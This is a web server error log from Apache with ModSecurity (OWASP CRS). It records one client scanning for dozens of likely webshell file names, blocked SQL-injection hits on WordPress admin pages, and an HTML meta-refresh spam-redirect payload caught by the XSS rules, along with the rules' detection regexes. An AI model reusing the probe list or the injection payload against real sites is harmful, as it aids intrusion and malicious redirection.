[Mon May 11 22:23:46.354092 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI60no_DFxNSZVmaX3O3AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:46.431733 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/t.php
[Mon May 11 22:23:46.532665 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/6xBAm3vODE05BSzkJZRAws.php
[Mon May 11 22:23:46.675445 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/a1.php
[Mon May 11 22:23:46.774425 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/onclickfuns.php
[Mon May 11 22:23:46.874632 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/w.php
[Mon May 11 22:23:46.944451 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI60no_DFxNSZVmaX3O3AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:47.119262 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/wp-good.php
[Mon May 11 22:23:47.218465 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/.info.php
[Mon May 11 22:23:47.318295 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/config.php
[Mon May 11 22:23:47.464149 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/item.php
[Mon May 11 22:23:47.642643 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/m.php
[Mon May 11 22:23:47.647657 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI603o_DFxNSZVmaX3O3QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:47.647918 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI603o_DFxNSZVmaX3O3QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:47.778329 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/rh.php
[Mon May 11 22:23:47.877698 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/ftde.php
[Mon May 11 22:23:48.000332 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/test1.php
[Mon May 11 22:23:48.141973 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/wp-temp.php
[Mon May 11 22:23:48.232694 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI603o_DFxNSZVmaX3O3QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:48.343928 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/fm.php
[Mon May 11 22:23:48.446011 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/themes.php
[Mon May 11 22:23:48.595789 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/wp-the.php
[Mon May 11 22:23:48.694338 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/CDX2.php
[Mon May 11 22:23:48.841180 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/profile.php
[Mon May 11 22:23:48.846503 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI61Ho_DFxNSZVmaX3O3gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:48.846761 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI61Ho_DFxNSZVmaX3O3gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:48.941119 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/ws80.php
[Mon May 11 22:23:49.073533 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/403.php
[Mon May 11 22:23:49.233300 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/a4.php
[Mon May 11 22:23:49.333876 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/app.php
[Mon May 11 22:23:49.433876 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/core.php
[Mon May 11 22:23:49.436869 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI61Ho_DFxNSZVmaX3O3gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:49.583985 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/lock360.php
[Mon May 11 22:23:49.686563 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/wp-block.php
[Mon May 11 22:23:49.835869 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI61Xo_DFxNSZVmaX3O4AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:49.836175 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI61Xo_DFxNSZVmaX3O4AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:50.032056 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/z.php
[Mon May 11 22:23:50.136737 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/hplfuns.php
[Mon May 11 22:23:50.295857 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/lock.php
[Mon May 11 22:23:50.395942 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI61Xo_DFxNSZVmaX3O4AAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:50.558688 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/ws.php
[Mon May 11 22:23:50.629965 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI61no_DFxNSZVmaX3O4QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:50.630262 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI61no_DFxNSZVmaX3O4QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:50.706455 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/ws49.php
[Mon May 11 22:23:50.836720 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/xozx.php
[Mon May 11 22:23:50.989730 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/xwx1.php
[Mon May 11 22:23:51.092702 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/Cap.php
[Mon May 11 22:23:51.223670 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/byrgo.php
[Mon May 11 22:23:51.234130 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI61no_DFxNSZVmaX3O4QAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:51.380597 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/css/index.php
[Mon May 11 22:23:51.435822 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI613o_DFxNSZVmaX3O4gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:51.436091 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI613o_DFxNSZVmaX3O4gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:51.482517 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/jp.php
[Mon May 11 22:23:51.597356 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/num.php
[Mon May 11 22:23:51.699545 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/12.php
[Mon May 11 22:23:51.792578 2026] [security2:error] [pid 1606352:tid 1606436] [client 103.59.161.151:61367] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI613o_DFxNSZVmaX3O4gAAANE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:23:51.862078 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/Ov-Simple1.php
[Mon May 11 22:23:51.967236 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/an.php
[Mon May 11 22:23:52.069048 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/archive.php
[Mon May 11 22:23:52.109464 2026] [security2:error] [pid 1601130:tid 1601164] [client 27.78.84.116:54527] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI62HEgAO_835W6c1mVYAAAAE4"]
[Mon May 11 22:23:52.110232 2026] [security2:error] [pid 1601130:tid 1601164] [client 27.78.84.116:54527] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI62HEgAO_835W6c1mVYAAAAE4"]
[Mon May 11 22:23:52.110421 2026] [security2:error] [pid 1601130:tid 1601164] [client 27.78.84.116:54527] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI62HEgAO_835W6c1mVYAAAAE4"]
[Mon May 11 22:23:52.110526 2026] [security2:error] [pid 1601130:tid 1601164] [client 27.78.84.116:54527] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI62HEgAO_835W6c1mVYAAAAE4"]
[Mon May 11 22:23:52.110710 2026] [security2:error] [pid 1601130:tid 1601164] [client 27.78.84.116:54527] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.kepenk\\xc2\\xa0trsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Youthful evening dress styles</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI62HEgAO_835W6c1mVYAAAAE4"]
[Mon May 11 22:23:52.111177 2026] [security2:error] [pid 1601130:tid 1601164] [client 27.78.84.116:54527] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI62HEgAO_835W6c1mVYAAAAE4"]
[Mon May 11 22:23:52.111448 2026] [security2:error] [pid 1601130:tid 1601164] [client 27.78.84.116:54527] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agI62HEgAO_835W6c1mVYAAAAE4"]
[Mon May 11 22:23:52.193237 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/db.php
[Mon May 11 22:23:52.350709 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/error.php
[Mon May 11 22:23:52.451492 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/ortasekerli1.php
[Mon May 11 22:23:52.598713 2026] [:error] [pid 1605480:tid 1605525] [client 20.63.32.193:9683] File does not exist: /home/nearoofr/public_html/wp-blog-header.php
